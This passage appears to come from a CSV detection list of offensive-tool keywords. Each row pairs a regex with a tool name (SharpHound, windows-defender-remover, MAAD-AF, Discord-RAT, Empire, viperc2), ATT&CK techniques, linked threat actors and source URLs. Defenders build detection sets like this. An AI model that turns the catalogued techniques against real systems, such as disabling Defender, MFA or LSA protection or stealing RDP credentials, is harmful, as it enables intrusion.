- T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z","40973" "*DisableKerberosSigning*",".{0,1000}DisableKerberosSigning.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","40974" "*DisableLSAProtection.reg*",".{0,1000}DisableLSAProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40976" "*DisableMailboxAuditing.ps1*",".{0,1000}DisableMailboxAuditing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40977" "*DisableMaintenanceTaskreportinginSecurityHealthUI.reg*",".{0,1000}DisableMaintenanceTaskreportinginSecurityHealthUI\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40978" "*DisableMFA.ps1*",".{0,1000}DisableMFA\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40979" "*DisableMicrosoftVulnerabileDriverBlocklist.reg*",".{0,1000}DisableMicrosoftVulnerabileDriverBlocklist\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40980" "*DisableRealtimeMonitoring $true*",".{0,1000}DisableRealtimeMonitoring\s\$true.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","40981" "*DisableSmartScreen.reg*",".{0,1000}DisableSmartScreen\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40982" "*DisableSpyNetTelemetry.reg*",".{0,1000}DisableSpyNetTelemetry\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40983" "*DisableSystemMitigations.reg*",".{0,1000}DisableSystemMitigations\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40984" "*Disable-TamperProtection.cpp*",".{0,1000}Disable\-TamperProtection\.cpp.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","40985" "*Disable-TamperProtection.exe*",".{0,1000}Disable\-TamperProtection\.exe.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","40986" "*DisableTamperProtection.reg*",".{0,1000}DisableTamperProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40987" "*DisableUAC.reg*",".{0,1000}DisableUAC\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - 
T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40988" "*DisableVBS.reg*",".{0,1000}DisableVBS\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40989" "*disableWinDef.cpp*",".{0,1000}disableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","40990" "*Disabling ASLR *",".{0,1000}Disabling\sASLR\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","40991" "*Disabling RDPStrike*",".{0,1000}Disabling\sRDPStrike.{0,1000}","offensive_tool_keyword","RdpStrike","Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP","T1081 - T1055.011 - T1012 - T1113 - T1040 - T1185","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xEr3bus/RdpStrike","1","0","N/A","N/A","10","3","238","27","2024-06-11T19:40:05Z","2024-06-11T19:31:50Z","40992" "*Disabling RdpThief*",".{0,1000}Disabling\sRdpThief.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","#content","N/A","10","10","1311","361","2024-07-20T06:58:02Z","2019-11-03T17:54:38Z","40993" "*discordapp.com/attachments/*/AnyDesk.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/AnyDesk\.exe.{0,1000}","offensive_tool_keyword","anydesk","Fake Anydesk distributed by discord - mars stealer","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI - Karakurt - Dispossessor","RMM","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40994" "*discordapp.com/attachments/*/BOINCPortable_*.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/BOINCPortable_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BOINC","Fake BOINC software distributed by discord 
- mars stealer","T1566 - T1587","N/A","N/A","N/A","Malware","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40995" "*discordgo.New(""Bot ..."")*",".{0,1000}discordgo\.New\(\""Bot\s\.\.\.\""\).{0,1000}","offensive_tool_keyword","discord-c2","C2 communication with discord","T1102.003 - T1071.001 - T1027.010 - T1105 - T1090.002","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bmdyy/discord-c2","1","0","N/A","N/A","10","10","60","6","2022-12-29T03:05:05Z","2022-12-08T19:10:23Z","40996" "*Discord-RAT-2.0-discordrat.zip*",".{0,1000}Discord\-RAT\-2\.0\-discordrat\.zip.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40997" "*Discord-RAT-2.0-master.zip*",".{0,1000}Discord\-RAT\-2\.0\-master\.zip.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40998" "*Discord-RAT-by-Biscuit-main*",".{0,1000}Discord\-RAT\-by\-Biscuit\-main.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40999" "*DiscoverBasicHostRecon.ahk*",".{0,1000}DiscoverBasicHostRecon\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","41000" "*Discover-PSInterestingServices*",".{0,1000}Discover\-PSInterestingServices.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41001" "*Discover-PSMSExchangeServers*",".{0,1000}Discover\-PSMSExchangeServers.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41002" "*Discover-PSMSSQLServers*",".{0,1000}Discover\-PSMSSQLServers.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41003" "*Discovery_AccountDiscovery_GetNetDomainUser.py*",".{0,1000}Discovery_AccountDiscovery_GetNetDomainUser\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41004" "*Discovery_AccountDiscovery_PowerView.py*",".{0,1000}Discovery_AccountDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41005" "*Discovery_ApplicationWindowDiscovery_EnumApplication.py*",".{0,1000}Discovery_ApplicationWindowDiscovery_EnumApplication\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41006" "*Discovery_Microphone_CallInfo.py*",".{0,1000}Discovery_Microphone_CallInfo\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41007" "*Discovery_Microphone_camera.py*",".{0,1000}Discovery_Microphone_camera\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41008" "*Discovery_Microphone_record_mic.py*",".{0,1000}Discovery_Microphone_record_mic\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41009" "*Discovery_NetworkServiceScanning_ARPScan.py*",".{0,1000}Discovery_NetworkServiceScanning_ARPScan\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41010" "*Discovery_NetworkServiceScanning_NbtScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_NbtScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41011" "*Discovery_NetworkServiceScanning_NextnetByPE.py*",".{0,1000}Discovery_NetworkServiceScanning_NextnetByPE\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41012" "*Discovery_NetworkServiceScanning_PingByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PingByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41013" "*Discovery_NetworkServiceScanning_PortScanByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41014" "*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*",".{0,1000}Discovery_NetworkServiceScanning_PortScanWithServiceByPython\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41015" "*Discovery_NetworkShareDiscovery_PowerView.py*",".{0,1000}Discovery_NetworkShareDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - 
T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41016" "*Discovery_PermissionGroupsDiscovery_PowerView.py*",".{0,1000}Discovery_PermissionGroupsDiscovery_PowerView\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41017" "*discovery_port_scan*",".{0,1000}discovery_port_scan.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","41018" "*Discovery_QueryRegistry_GetDotNetVersions.py*",".{0,1000}Discovery_QueryRegistry_GetDotNetVersions\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41019" "*Discovery_QueryRegistry_GetRDPPort.py*",".{0,1000}Discovery_QueryRegistry_GetRDPPort\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","41020" "*Discovery_RemoteSystemDiscovery_GetDomainIPAddress.py*",".{0,1000}Discovery_RemoteSystemDiscovery_GetDomainIPAddress\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 